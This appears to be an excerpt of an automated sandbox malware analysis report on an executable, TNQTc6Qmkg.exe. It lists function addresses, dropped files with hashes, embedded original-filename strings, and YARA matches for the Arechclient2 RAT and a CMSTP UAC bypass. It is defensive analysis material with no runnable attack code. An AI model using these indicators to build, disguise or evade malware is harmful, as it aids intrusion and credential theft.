Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05CFBE87	0_2_05CFBE87
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05CFF6A8	0_2_05CFF6A8
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05CFC6B3	0_2_05CFC6B3
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05D02607	0_2_05D02607
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05CF89C8	0_2_05CF89C8
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05D0B989	0_2_05D0B989
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05CFC131	0_2_05CFC131
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05CFC3F8	0_2_05CFC3F8
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05CFBB15	0_2_05CFBB15
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: 0_2_05CFCA63	0_2_05CFCA63
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0735A0	1_2_6B0735A0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0BD320	1_2_6B0BD320
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B075340	1_2_6B075340
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B08C370	1_2_6B08C370
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B07F380	1_2_6B07F380
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0E53C8	1_2_6B0E53C8
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0B9A60	1_2_6B0B9A60
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0EBA90	1_2_6B0EBA90
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0722A0	1_2_6B0722A0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0A4AA0	1_2_6B0A4AA0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B08CAB0	1_2_6B08CAB0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0E2AB0	1_2_6B0E2AB0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0B8AC0	1_2_6B0B8AC0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B091AF0	1_2_6B091AF0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0BE2F0	1_2_6B0BE2F0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B09A940	1_2_6B09A940
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B08D960	1_2_6B08D960
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0CB970	1_2_6B0CB970
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0EB170	1_2_6B0EB170
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0B5190	1_2_6B0B5190
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0D2990	1_2_6B0D2990
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B07C9A0	1_2_6B07C9A0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0AD9B0	1_2_6B0AD9B0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B087810	1_2_6B087810
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0BB820	1_2_6B0BB820
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0C4820	1_2_6B0C4820
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B098850	1_2_6B098850
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B09D850	1_2_6B09D850
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0BF070	1_2_6B0BF070
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0A60A0	1_2_6B0A60A0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0E50C7	1_2_6B0E50C7
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B09C0E0	1_2_6B09C0E0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0B58E0	1_2_6B0B58E0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B089F00	1_2_6B089F00
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0B7710	1_2_6B0B7710
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0C77A0	1_2_6B0C77A0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B07DFE0	1_2_6B07DFE0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0A6FF0	1_2_6B0A6FF0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0C5600	1_2_6B0C5600
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0B7E10	1_2_6B0B7E10
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0D9E30	1_2_6B0D9E30
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0C2E4E	1_2_6B0C2E4E
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B094640	1_2_6B094640
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B099E50	1_2_6B099E50
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0B3E50	1_2_6B0B3E50
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0E6E63	1_2_6B0E6E63
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B07C670	1_2_6B07C670
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0DE680	1_2_6B0DE680
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B095E90	1_2_6B095E90
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0D4EA0	1_2_6B0D4EA0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0E76E3	1_2_6B0E76E3
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B07BEF0	1_2_6B07BEF0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B08FEF0	1_2_6B08FEF0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B08FD00	1_2_6B08FD00
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0A0512	1_2_6B0A0512
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B09ED10	1_2_6B09ED10
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0B0DD0	1_2_6B0B0DD0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0D85F0	1_2_6B0D85F0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0EAC00	1_2_6B0EAC00
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0B5C10	1_2_6B0B5C10
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0C2C10	1_2_6B0C2C10
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0E542B	1_2_6B0E542B
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B085440	1_2_6B085440
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0E545C	1_2_6B0E545C
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B086C80	1_2_6B086C80
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0D34A0	1_2_6B0D34A0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0DC4A0	1_2_6B0DC4A0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0864C0	1_2_6B0864C0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B09D4D0	1_2_6B09D4D0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B07D4E0	1_2_6B07D4E0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6B0B6CF0	1_2_6B0B6CF0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C66AC60	1_2_6C66AC60
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C73AC30	1_2_6C73AC30
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C726C00	1_2_6C726C00
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C65ECC0	1_2_6C65ECC0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6BECD0	1_2_6C6BECD0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C72ED70	1_2_6C72ED70
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C78AD50	1_2_6C78AD50
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C7E8D20	1_2_6C7E8D20
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C7ECDC0	1_2_6C7ECDC0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C664DB0	1_2_6C664DB0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6F6D90	1_2_6C6F6D90
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6FEE70	1_2_6C6FEE70
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C740E20	1_2_6C740E20
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C66AEC0	1_2_6C66AEC0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C700EC0	1_2_6C700EC0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6E6E90	1_2_6C6E6E90
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C722F70	1_2_6C722F70
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6CEF40	1_2_6C6CEF40
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C7A0F20	1_2_6C7A0F20
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C666F10	1_2_6C666F10
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C73EFF0	1_2_6C73EFF0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C660FE0	1_2_6C660FE0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C7A8FB0	1_2_6C7A8FB0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C66EFB0	1_2_6C66EFB0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C734840	1_2_6C734840
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6B0820	1_2_6C6B0820
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6EA820	1_2_6C6EA820
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C7668E0	1_2_6C7668E0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C698960	1_2_6C698960
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6B6900	1_2_6C6B6900
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C77C9E0	1_2_6C77C9E0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6949F0	1_2_6C6949F0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C7209B0	1_2_6C7209B0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6F09A0	1_2_6C6F09A0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C71A9A0	1_2_6C71A9A0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6DCA70	1_2_6C6DCA70
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C718A30	1_2_6C718A30
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C70EA00	1_2_6C70EA00
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6DEA80	1_2_6C6DEA80
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C766BE0	1_2_6C766BE0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C700BA0	1_2_6C700BA0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C678460	1_2_6C678460
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6C4420	1_2_6C6C4420
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6EA430	1_2_6C6EA430
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6A64D0	1_2_6C6A64D0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6FA4D0	1_2_6C6FA4D0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C78A480	1_2_6C78A480
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C700570	1_2_6C700570
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6C2560	1_2_6C6C2560
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C7A8550	1_2_6C7A8550
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6B8540	1_2_6C6B8540
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C764540	1_2_6C764540
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C72A5E0	1_2_6C72A5E0
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: 1_2_6C6EE5F0	1_2_6C6EE5F0
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_0009F840	5_2_0009F840
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_00084060	5_2_00084060
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_00082120	5_2_00082120
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_000A6130	5_2_000A6130
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_0009B150	5_2_0009B150
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_000D9A00	5_2_000D9A00
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_000CCAA0	5_2_000CCAA0
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_00094390	5_2_00094390
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_000A0390	5_2_000A0390
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_000AFC10	5_2_000AFC10
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_000D5550	5_2_000D5550
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_0008D570	5_2_0008D570
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_000D96E0	5_2_000D96E0
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_0008A6F0	5_2_0008A6F0
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_000A66F0	5_2_000A66F0
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: 5_2_000837B0	5_2_000837B0

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: String function: 6B0B94D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: String function: 6C7EDAE0 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: String function: 6C7E09D0 appears 140 times
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: String function: 6C683620 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: String function: 004043B0 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: String function: 6C689B10 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u3bs.0.exe	Code function: String function: 6B0ACBE8 appears 134 times
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: String function: 05CF9F27 appears 48 times
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: String function: 00409CC0 appears 48 times
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: String function: 05D17A73 appears 43 times
Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe	Code function: String function: 0042780C appears 43 times
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: String function: 00081310 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: String function: 00081900 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: String function: 000814F0 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: String function: 00081930 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\u3bs.2\run.exe	Code function: String function: 00209D36 appears 33 times

Source: C:\Users\user\Desktop\TNQTc6Qmkg.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 1392

Source: TNQTc6Qmkg.exe, 00000000.00000002.2973269957.0000000005F07000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2225541278.0000000005F87000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2237619009.0000000005F66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2228201523.0000000005F73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2225483723.0000000005F78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2236805991.0000000005F61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2238332150.0000000005F5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2237860092.0000000005F6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2237646163.0000000005F7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2225932353.0000000005F79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2225433336.0000000005F5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2237518955.0000000005F6B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2231224725.0000000005F72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2237904684.0000000005F5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2237976229.0000000005F79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \OriginalFileName vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2226365489.0000000005F82000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2225742168.0000000005F72000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2228157373.0000000005F6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2236985274.0000000005F68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2238474568.0000000005F7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2238520188.0000000005F7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000000.1674370393.0000000004043000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirezer0 vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2228130224.0000000005F60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2225525850.0000000005F80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778740018.00000000042AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFirezer0 vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005F54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.1729507004.0000000005ED1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFirezer0 vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2227874761.0000000005F62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2236526203.0000000005F54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2779042432.0000000005F06000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2235425712.0000000005F66000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamempclient.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe, 00000000.00000003.2225555404.0000000005F8B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs TNQTc6Qmkg.exe
Source: TNQTc6Qmkg.exe	Binary or memory string: OriginalFilenameFirezer0 vs TNQTc6Qmkg.exe

Source: TNQTc6Qmkg.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 14.2.cmd.exe.5d800c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 5.2.run.exe.3c1a15b.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.cmd.exe.5d800c8.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 14.2.cmd.exe.57b4e64.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.cmd.exe.60b00c8.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 13.2.run.exe.3ea215b.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.run.exe.3bd686d.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.cmd.exe.60b00c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 6.2.cmd.exe.56bbe64.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
